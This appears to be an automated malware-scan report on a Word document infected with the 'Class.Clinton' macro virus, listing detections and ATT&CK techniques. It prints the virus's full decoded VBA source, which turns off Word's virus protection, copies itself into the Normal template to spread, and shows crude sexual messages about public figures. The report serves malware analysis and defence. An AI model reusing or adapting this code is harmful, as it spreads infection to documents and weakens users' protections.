Verdict: MALICIOUS
Risk Score: 202
Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample contains legacy WordBasic macro virus markers and actively uses VBA macros, including AutoOpen and Auto_Close, to infect the Normal template. The script attempts to export its code to 'c:\Clinton.sys' and then inject it into the Normal template, indicating a macro-based infection attempt. The ClamAV detection 'Doc.Trojan.Class-45' further supports the malicious nature of the file.
Heuristics (6)
- ClamAV: Doc.Trojan.Class-45 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Class-45.
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro present.
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro present.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.abcnews.com/ (in document text, OLE body)
  - http://www.msnbc.com/ (in document text, OLE body)
  - http://www.cnn.com/ (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1844 bytes | da5ca0dfcfa03f91ecc884fb711d21fc7332b4dde35beea35ff9392ed0a05f1f |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    On Error GoTo out
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Clintons = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
    Clintonr = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
    If Clintonr > 70 And Clintons > 0 Then GoTo out
    If Clintonr < 70 Then
        Set Monica = NormalTemplate.VBProject.VBComponents.Item(1)
        ActiveDocument.VBProject.VBComponents.Item(1).Name = Monica.Name
        ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\Clinton.sys"
    End If
    If Clintons = 0 Then Set Monica = ActiveDocument.VBProject.VBComponents.Item(1)
    Infection = Int(Rnd * 100)
    If Infection = 99 Then MsgBox "Monica Blows Clinton! -=News@11=-"
    If Day(Now) = 17 And (Month(Now) > 8) Then MsgBox "Today is Clinton & Monica Fuck-Fest Day!"
    Monica.codemodule.AddFromFile ("c:\Clinton.sys")
    With Monica.codemodule
        For x = 1 To 4
            .deletelines 1
        Next x
    End With
    If Clintonr < 70 Then
        With Monica.codemodule
            .replaceline 1, "Sub AutoClose()"
            .replaceline 75, "Sub ToolsMacro()"
        End With
    End If
    With Monica.codemodule
        For x = 2 To 72 Step 2
            .replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
        Next x
    End With
out:
    If Clintonr > 70 And Clintons = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ViewVBCode()
    'Word97/Class.Clinton by Virus, Thanks Vic.
End Sub
```